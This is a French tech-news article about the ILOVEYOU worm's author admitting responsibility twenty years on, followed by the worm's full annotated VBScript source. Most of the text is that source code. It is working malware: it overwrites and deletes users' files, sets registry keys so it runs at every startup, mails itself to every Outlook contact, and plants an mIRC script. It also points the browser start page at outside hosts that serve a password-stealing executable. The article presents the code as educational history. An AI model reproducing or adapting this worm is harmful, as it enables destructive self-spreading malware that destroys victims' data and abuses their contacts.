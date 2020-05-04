Vous êtes nouveau sur Developpez.com ? Créez votre compte ou connectez-vous afin de pouvoir participer !

L'auteur de la pandémie de virus informatique « I Love You » de l'année 2000 reconnaît enfin sa culpabilité
20 ans après l'infection de millions de machines à travers le monde par son logiciel

Le , par Patrick Ruiz
1 commentaire

11PARTAGES

10  0 
L’homme derrière le premier virus informatique à s'être propagé à grande échelle a finalement admis sa culpabilité, 20 ans après l’infection de millions de machines à travers le monde par son logiciel. C’est le résultat d’un travail de longue haleine du journaliste spécialisé en technologie Geoff White.

Pendant deux décennies, un quasi-mystère a plané sur l’identité de l’individu derrière cette attaque. En effet, suite aux enquêtes initiales menées à l’époque de l’apparition du virus informatique, le présumé auteur (alors étudiant en informatique) n’avait pas réfuté la possibilité qu’il soit le véritable responsable. Dans une récente publication, ce dernier met fin à toute spéculation et assume l’entière responsabilité de la première pandémie de virus informatique.

Celle-ci est connue du monde depuis le 4 mai 2000 sous diverses appellations : I Love You (je t’aime), Loveletter ou encore Love Bug. Les victimes recevaient un courriel avec une pièce jointe intitulée LOVE-LETTER-FOR-YOU. Cette dernière contenait en fait du code VBScript capable d’écraser des fichiers, de voler des mots de passe et d’envoyer des copies de lui-même de façon automatique à tous les contacts du carnet d’adresses Microsoft Outlook de la victime. En quelques heures, le virus mis au point par Onel de Guzman s’était propagé dans le monde entier. Bilan initial : près de 45 millions de machines, soit environ 10 % de tous les ordinateurs connectés à Internet sur la planète à cette époque. De grosses organisations comme le Pentagone et le Parlement du Royaume-Uni avaient dû déconnecter leurs infrastructures de courriel pendant des heures pour s’en prémunir. D’après ce que rapporte la BBC, les ravages causés par l’attaque informatique se chiffrent à des milliards de dollars.


À l'époque, la connexion à Internet se faisait par le biais du réseau téléphonique commuté et nécessitait de tels mots de passe. Onel de Guzman a expliqué à la BBC qu’il avait créé le ver informatique afin de voler des mots de passe et d'accéder ainsi à Internet sans débourser d’argent. Désormais âgé de 44 ans, de Guzman assure qu’il n’a jamais eu l’intention que son ver informatique se répande à l’échelle mondiale.

« Je ne m’attendais pas à ce qu’il se retrouve aux États-Unis et en Europe. J’étais surpris », a-t-il affirmé dans une entrevue. Pourtant, il a modifié le code du virus au printemps 2000 de façon à profiter d’une lacune du système d’exploitation Microsoft Windows 95, ce, pour créer une chaîne de transmission automatique au travers du logiciel Outlook de Microsoft. Initialement, il faisait parvenir le virus uniquement à des victimes aux Philippines. Le contact avec ces dernières se faisait via des espaces de clavardage.

À l’époque, les autorités le soupçonnaient sur la base de traces retrouvées sur des supports informatiques logés dans une chambre d’étudiant qu’il partageait avec son frère. En fait, les disques trouvés sur place par la police de Manille prouvaient qu’il était l’un des auteurs. Sur cet aspect, Onel de Guzman précise qu’il était le seul auteur du virus.

« C'est un cheval de Troie qui proclame son amour pour le destinataire et vous demande d'ouvrir sa pièce jointe. Même pour un premier rendez-vous, il vous aime alors tellement qu'il envoie des copies de lui-même à toutes les personnes de votre carnet d'adresses et commence à détruire des fichiers sur votre disque », souligne un internaute des contradictions caractéristiques de la conception de ce virus. En effet, comment expliquer la présence de fonctionnalités de destruction de fichiers alors que l’objectif était de récupérer des mots de passe pour accéder à Internet sans dépenser de l’argent ?


Onel de Guzman a exprimé des regrets quant aux dommages que sa création a causés. À Manille, il œuvre désormais dans la réparation de téléphones portables. Le code source du ver informatique est disponible à des fins pédagogiques :

Code VBScript : Sélectionner tout 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
rem  barok -loveletter(vbe) <i hate go to school>
rem by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines
On Error Resume Next

rem Setup global variables to be used throughout subroutines and functions.
Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
eq = ""
ctr = 0

rem Open the current script file and define "vbscopy" which can be used to
rem read its own contents. Used to replicate itself in other files.
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
vbscopy = file.ReadAll

main()

rem Subroutine to initalize the program
Sub main()
  On Error Resume Next
  Dim wscr, rr

  Set wscr = CreateObject("WScript.Shell")
  rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")

  If (rr >= 1) Then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
  End If

  rem Finds special folders, such as system, temporary and windows folders.
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  Set c = fso.GetFile(WScript.ScriptFullName)

  rem Copy itself into VBScript files MSKernel32.vbs, Win32DLL.vbs and
  rem LOVE-LETTER-FOR-YOU.TXT.vbs
  c.Copy(dirsystem & "\MSKernel32.vbs")
  c.Copy(dirwin & "\Win32DLL.vbs")
  c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")

  regruns()
  html()
  spreadtoemail()
  listadriv()
End Sub

rem Subroutine to create/update registry values.
Sub regruns()
  On Error Resume Next
  Dim num, downread

  rem Set the system to automatically run MSKernel32.vbs and Win32DLL.vbs on startup.
  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem & "\MSKernel32.vbs"
  regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", dirwin & "\Win32DLL.vbs"

  rem Get internet Explorer's download directory.
  downread = ""
  downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")

  rem If the directory wasn't found, then use C:\ drive as the download directory.
  If (downread = "") Then
    downread = "c:\"
  End If

  rem Check if a file named "WinFAT32.exe" exists in the system files.
  If (fileexist(dirsystem & "\WinFAT32.exe") = 1) Then
    Randomize

    rem Generate a random number from 1 to 4.
    num = Int((4 * Rnd) + 1)

    rem Randomly update the Internet Explorer's start page that leads to a
    rem page that will download a malicious executable "WIN-BUGSFIX.exe".
    If num = 1 Then
      regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
    ElseIf num = 2 Then
      regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    ElseIf num = 3 Then
      regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
    ElseIf num = 4 Then
      regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
    End If
  End If

  rem Check if the "WIN-BUGSFIX.exe" file exists in the download directory.
  If (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) Then
    rem Add WIN-BUGSFIX.exe to run on startup
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe"
    rem Update Internet Explorer's start page to "about:blank"
    regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage", "about:blank"
  End If
End Sub

rem Subroutine to list folders in drives.
Sub listadriv()
  On Error Resume Next
  Dim d, dc, s

  Set dc = fso.Drives

  For Each d In dc
    If (d.DriveType = 2) Or (d.DriveType = 3) Then
      folderlist(d.path & "\")
    End If
  Next

  listadriv = s
End Sub

rem Subroutine infect other files, by copying itself into them as well
rem as creating a malicious mIRC script.
Sub infectfiles(folderspec)
  On Error Resume Next
  Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3

  Set f = fso.GetFolder(folderspec)
  Set fc = f.Files

  For Each f1 In fc
    ext = fso.GetExtensionName(f1.path)
    ext = lcase(ext)
    s = lcase(f1.name)

    rem Copies itself into every file with vbs/vbe extension.
    If (ext = "vbs") Or (ext = "vbe") Then
      Set ap = fso.OpenTextFile(f1.path, 2, true)

      ap.write vbscopy
      ap.close
    rem Copies itself into every file with js/jse/css/wsh/sct/hta extension.
    ElseIf (ext = "js")
      Or (ext = "jse")
      Or (ext = "css")
      Or (ext = "wsh")
      Or (ext = "sct")
      Or (ext = "hta")
    Then
      Set ap = fso.OpenTextFile(f1.path, 2, true)

      ap.write vbscopy
      ap.close
      bname = fso.GetBaseName(f1.path)

      Set cop = fso.GetFile(f1.path)

      cop.copy(folderspec & "\" & bname & ".vbs")
      fso.DeleteFile(f1.path)
    rem Copies itself into every file with jpg/jpeg extension.
    ElseIf (ext = "jpg") Or (ext = "jpeg") Then
      rem Copies itself
      Set ap = fso.OpenTextFile(f1.path, 2, true)

      ap.write vbscopy
      ap.close

      Set cop = fso.GetFile(f1.path)

      cop.copy(f1.path & ".vbs")
      fso.DeleteFile(f1.path)
    rem Copies itself into every file with mp3/mp2 extension.
    ElseIf (ext = "mp3") Or (ext = "mp2") Then
      Set mp3 = fso.CreateTextFile(f1.path & ".vbs")

      mp3.write vbscopy
      mp3.close

      Set att = fso.GetFile(f1.path)

      att.attributes = att.attributes + 2
    End If

    If (eq <> folderspec) Then
      rem Looks for mIRC and related files to determine whether it
      rem should create/replace its script.ini with a malicious script.
      If (s = "mirc32.exe")
        Or (s = "mlink32.exe")
        Or (s = "mirc.ini")
        Or (s = "script.ini")
        Or (s = "mirc.hlp")
      Then
        Set scriptini = fso.CreateTextFile(folderspec & "\script.ini")
        rem The following mIRC script checks if the "nick" of a user is the same
        rem as "me" to halt and send a DCC command to send a message to the user
        rem with a link to the LOVE=LETTER-FOR-YOU html page on the system.
        scriptini.WriteLine "[script]"
        scriptini.WriteLine ";mIRC Script"
        scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, If mIRC will"
        scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks"
        scriptini.WriteLine ";"
        scriptini.WriteLine ";Khaled Mardam-Bey"
        scriptini.WriteLine ";http://www.mirc.com"
        scriptini.WriteLine ";"
        scriptini.WriteLine "n0=on 1:JOIN:#:{"
        scriptini.WriteLine "n1=  /If ( $nick == $me ) { halt }"
        scriptini.WriteLine "n2=  /.dcc send $nick" & dirsystem & "\LOVE-LETTER-FOR-YOU.HTM"
        scriptini.WriteLine "n3=}"
        scriptini.close

        eq = folderspec
      End If
    End If
  Next
End Sub

rem Subroutine used to get file listing of a folder.
Sub folderlist(folderspec)
  On Error Resume Next
  Dim f, f1, sf

  Set f = fso.GetFolder(folderspec)
  Set sf = f.SubFolders

  For Each f1 In sf
    infectfiles(f1.path)
    folderlist(f1.path)
  Next
End Sub

rem Subroutine used to create/write registry entries.
Sub regcreate(regkey,regvalue)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegWrite regkey, regvalue
End Sub

rem Subroutine used to get registry entries.
Function regget(value)
  Set regedit = CreateObject("WScript.Shell")
  regget = regedit.RegRead(value)
End Function

rem Function to check if a file exists.
Function fileexist(filespec)
  On Error Resume Next
  Dim msg

  If (fso.FileExists(filespec)) Then
    msg = 0
  Else
    msg = 1
  End If

  fileexist = msg
End Function

rem Function to check if a folder exists.
Function folderexist(folderspec)
  On Error Resume Next
  Dim msg

  If (fso.GetFolderExists(folderspec)) Then
    msg = 0
  Else
    msg = 1
  End If

  fileexist = msg
End Function

rem Subroutine to send emails to the user's contacts (MAPI)
Sub spreadtoemail()
  On Error Resume Next
  Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad

  Set regedit = CreateObject("WScript.Shell")
  Set out = WScript.CreateObject("Outlook.Application")
  Set mapi = out.GetNameSpace("MAPI")

  rem Goes through all contacts in the address book and sends an email
  rem with the LOVE-LETTER-FOR-YOU program as an attachment.
  For ctrlists = 1 To mapi.AddressLists.Count
    Set a = mapi.AddressLists(ctrlists)
    x = 1
    regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)

    If (regv = "") Then
      regv = 1
    End If

    If (int(a.AddressEntries.Count) > int(regv)) Then
      For ctrentries = 1 To a.AddressEntries.Count
        malead = a.AddressEntries(x)
        regad = ""
        regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead )

        If (regad = "") Then
          Set male = out.CreateItem(0)

          male.Recipients.Add(malead)
          male.Subject = "ILOVEYOU"
          male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
          male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
          male.Send

          regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD"
        End If

        x = x + 1
      Next

      regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count
    Else
      regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count
    End If
  Next

  Set out = Nothing
  Set mapi = Nothing
End Sub

rem Subroutine to generate and create the HTML file for LOVE-LETTER-FOR-YOU.HTM.
Sub html
  On Error Resume Next
  Dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6

  rem Generates an HTML page which contains JScript and VBScript replicate itself.
  rem by leveraging ActiveX. It also listens for mouse and key events, which
  rem ends up open more windows of the page.
  dta1 = "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"
    & vbcrlf & _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"
    & vbcrlf & _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"
    & vbcrlf & _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "
    & vbcrlf & _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"
    & vbcrlf & _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"
    & vbcrlf & _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>"
    & vbcrlf & _ "<?-?BODY><?-?HTML>"
    & vbcrlf & _ "<SCRIPT language=@-@JScript@-@>"
    & vbcrlf & _ "<!--?-??-?"
    & vbcrlf & _ "If (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"
    & vbcrlf & _ "?-??-?-->"
    & vbcrlf & _ "<?-?SCRIPT>"
    & vbcrlf & _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"
    & vbcrlf & _ "<!--"
    & vbcrlf & _ "on error resume next"
    & vbcrlf & _ "Dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"
    & vbcrlf & _ "aw=1"
    & vbcrlf & _ "code="

  dta2 = "Set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"
    & vbcrlf & _ "Set dirsystem=fso.GetSpecialFolder(1)"
    & vbcrlf & _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"
    & vbcrlf & _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"
    & vbcrlf & _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"
    & vbcrlf & _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"
    & vbcrlf & _ "wri.write code4"
    & vbcrlf & _ "wri.close"
    & vbcrlf & _ "If (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) Then"
    & vbcrlf & _ "If (err.number=424) Then"
    & vbcrlf & _ "aw=0"
    & vbcrlf & _ "End If"
    & vbcrlf & _ "If (aw=1) Then"
    & vbcrlf & _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"
    & vbcrlf & _ "window.close"
    & vbcrlf & _ "End If"
    & vbcrlf & _ "End If"
    & vbcrlf & _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"
    & vbcrlf & _ "regedit.RegWrite@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"
    & vbcrlf & _ "?-??-?-->"
    & vbcrlf & _ "<?-?SCRIPT>"

  dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'")
  dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """")
  dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/")
  dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\")
  dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'")
  dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """")
  dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/")
  dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\")

  Set fso = CreateObject("Scripting.FileSystemObject")
  Set c = fso.OpenTextFile(WScript.ScriptFullName, 1)

  lines = Split(c.ReadAll,vbcrlf)
  l1 = ubound(lines)

  For n = 0 to ubound(lines)
    lines(n) = replace(lines(n), "'", chr(91) + chr(45) + chr(91))
    lines(n) = replace(lines(n), """", chr(93) + chr(45) + chr(93))
    lines(n) = replace(lines(n), "\", chr(37) + chr(45) + chr(37))

    If (l1 = n) Then
      lines(n) = chr(34) + lines(n) + chr(34)
    Else
      lines(n) = chr(34) + lines(n) + chr(34) & " & vbcrlf & _"
    End If
  Next

  rem Create the LOVE-LETTER-FOR-YOU.HTM file in the system directory.
  Set b = fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
  b.close

  Set d = fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM", 2)
  d.write dt5
  d.write join(lines, vbcrlf)
  d.write vbcrlf
  d.write dt6
  d.close
End Sub

Source : BBC

Et vous ?

Quels enseignements tirez-vous du code source de ce maliciel ?
Quel commentaire faites-vous de la présence de fonctionnalités destructrices en son sein ?
Ne sont-elles pas en contradiction avec ce que l’auteur dit être ses objectifs initiaux ?
Quelles sont vos anecdotes en lien avec cette pandémie informatique de l’année 2000 ?

1 commentaire
tutosfaciles48
Avatar de tutosfaciles48
Membre régulier https://www.developpez.com
Le 04/05/2020 à 13:27
Quels enseignements tirez-vous du code source de ce maliciel ?
Et ben qu'il semblait simple d'accéder aux contacts de la personne sans aucun contrôle sur son autorisation ou non
0  0 

 